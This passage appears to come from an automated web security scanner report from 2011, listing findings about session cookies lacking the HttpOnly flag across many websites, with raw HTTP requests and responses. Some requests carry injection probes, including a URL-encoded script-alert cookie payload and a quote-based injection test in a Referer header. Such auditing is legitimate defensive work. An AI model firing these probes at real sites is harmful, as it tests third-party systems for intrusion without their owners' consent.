Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.160. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.161. http://www.packtpub.com/award previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.packtpub.com
Path:	/award

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /award HTTP/1.1
Host: www.packtpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.162. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=1a2a1fi9q2vop26mnuph8otr37; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

14.163. http://www.parenthood.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.parenthood.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2bb2r6pp17500tshvuo5ak5ap5; path=/
BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.164. http://www.roomsaver.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.roomsaver.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=8tjbv0o18kobn9bckebm33vd32; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.roomsaver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.165. http://www.sea-tec.it/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sea-tec.it
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQCBQBBR=FJGEDFLCALFBGHNFMNPFKKON; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sea-tec.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 144
Content-Type: text/html
Location: it/index.asp
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCBQBBR=FJGEDFLCALFBGHNFMNPFKKON; path=/
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:43 GMT
Connection: close

<head><title>Oggetto spostato</title></head>
<body><h1>Oggetto spostato</h1>Questo oggetto . disponibile <a HREF="it/index.asp">qui</a>.</body>

14.166. http://www.senioroutlook.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.senioroutlook.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSSBQQRT=HMPBCLOCPPJOAKGIALPFPFPD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.senioroutlook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 132
Content-Type: text/html
Location: default.asp
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSSBQQRT=HMPBCLOCPPJOAKGIALPFPFPD; path=/
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 00:09:16 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

14.167. http://www.squidoo.com/lensmaster/bookmark previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.squidoo.com
Path:	/lensmaster/bookmark

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=6p76tbjmo4sg3qaa5nn32r74t5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lensmaster/bookmark HTTP/1.1
Host: www.squidoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Set-Cookie: PHPSESSID=6p76tbjmo4sg3qaa5nn32r74t5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.squidoo.com/member/login
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Tue, 25 Jan 2011 04:37:15 GMT
X-Varnish: 1756961506
Age: 0
Via: 1.1 varnish
Connection: close

14.168. http://www.t-mobile.com/Company/Community.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.t-mobile.com
Path:	/Company/Community.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.169. http://www.thisnext.com/pick/new/submit/sociable/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thisnext.com
Path:	/pick/new/submit/sociable/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=046f9657edcc992948bb669f4e6686bd; path=/
browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.170. http://www.w-w-i.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.w-w-i.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.171. http://www.w-w-i.com/velux_5_oceans_2010_race/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.w-w-i.com
Path:	/velux_5_oceans_2010_race/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.172. http://www.yachtscoring.com/event_results_cumulative.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.yachtscoring.com
Path:	/event_results_cumulative.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7018349;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
CFTOKEN=92203677;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
CFID=7018349;path=/
CFTOKEN=92203677;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event_results_cumulative.cfm HTTP/1.1
Host: www.yachtscoring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 25 Jan 2011 04:42:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=7018349;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
Set-Cookie: CFTOKEN=92203677;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
Set-Cookie: CFID=7018349;path=/
Set-Cookie: CFTOKEN=92203677;path=/
location: ./select_event.cfm?CFID=7018349&CFTOKEN=92203677
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

14.173. http://www3.whdh.com/mobile/phoneforecast/settings.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www3.whdh.com
Path:	/mobile/phoneforecast/settings.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.174. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.175. https://acc.newsguy.com/user/-/accnt_billing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_billing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.176. https://acc.newsguy.com/user/-/accnt_contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.177. https://acc.newsguy.com/user/-/accnt_flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_flash

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.178. https://acc.newsguy.com/user/-/accnt_history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_history

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.179. https://acc.newsguy.com/user/-/customer_referrals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/customer_referrals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.180. https://acc.newsguy.com/user/-/referrals_cashout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/referrals_cashout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.181. https://acc.newsguy.com/user/accnt_overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.182. https://acc.newsguy.com/user/accnt_renew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_renew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.183. https://acc.newsguy.com/user/accnt_settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_settings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.184. https://acc.newsguy.com/user/accnt_signup_usenet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_signup_usenet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.185. https://acc.newsguy.com/user/accnt_upgrade previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_upgrade

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.186. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
rdrlst=2110s7dpletz4d0000000c0o02050210co2ylebnns0000000g0o02050210f10elfk1rn000000010o010501101mmnlebnns0000000g0o02050210fxo1lebnns0000000g0o02050210fx1blebnns0000000g0o02050210feh5lf17qf000000080o0205021086bylemlne0000000e0o02050210ew3clebnns0000000g0o02050210f7gmlebnns0000000g0o02050210fjv6lebnns0000000g0o02050210fj4ilew2e20000000a0o02050210axthlebnns0000000g0o02050210ffullf8gij000000040o02050210410flfk1rn000000010o0105011010c9lfk1rn000000010o010501101jillebnns0000000g0o02050210ffuqlegh2b0000000f0o02050210fb6mlf17qk000000070o020502107mz1lebnns0000000g0o02050210fcajlfk1rn000000010o010501101p7vlebnns0000000g0o02050210f7vglfk1rn000000010o010501101xvslebnns0000000g0o02050210f10elfk1rn000000010o01050110110rlfjpei000000020o020502102xuklebnns0000000g0o02050210fx1jlebnns0000000g0o02050210fjk7lebnns0000000g0o02050210fcbnlfk1rn000000010o010501101yiplebnns0000000g0o02050210fyh0lebnns0000000g0o02050210fxwflebnns0000000g0o02050210fe4vlebnns0000000g0o02050210f10elfk1rn000000010o010501101jwblfk1rn000000010o010501101xwblebnns0000000g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.187. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.188. http://ad.masjo.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.masjo.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=4&target=_blank&cb=9279381274&charset=UTF-8&loc=http%3A//www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ec4a5acfda9b/page/419/x22&referer=http%3A//burp/show/30 HTTP/1.1
Host: ad.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:03:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:52 GMT; path=/
Content-Length: 978
Content-Type: text/javascript; charset=UTF-8

var OX_3cba64f0 = '';
OX_3cba64f0 += "<"+"a href=\'http://ad.masjo.com/www/delivery/ck.php?oaparams=2__bannerid=10__zoneid=4__cb=bd3aec0742__oadest=http%3A%2F%2Fsecure.hostgator.com%2F%7Eaffiliat%2Fcg
...[SNIP]...

14.189. http://ad.masjo.com/www/delivery/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.masjo.com
Path:	/www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 22:29:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php?oaparams=2__bannerid=10__zoneid=4__cb=bd3aec0742__oadest=http%3A%2F%2Fsecure.hostgator.com%2F%7Eaffiliat%2Fcgi-bin%2Faffiliates%2Fclickthru.cgi%3Fid%3Dkangaway\ HTTP/1.1
Host: ad.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; OAID=84cb75988ed38bcbe06c44d77408a71e; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:29:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 22:29:23 GMT; path=/
Location: http://secure.hostgator.com/~affiliat/cgi-bin/affiliates/clickthru.cgi?id=kangaway
Content-Length: 0
Connection: close
Content-Type: text/html

14.190. http://ad.masjo.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.masjo.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=10&campaignid=3&zoneid=4&loc=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn+typing+quick+and+easy+cracka074f%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&referer=http%3A%2F%2Fburp%2Fshow%2F30&cb=bd3aec0742 HTTP/1.1
Host: ad.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:03:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:53 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.191. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
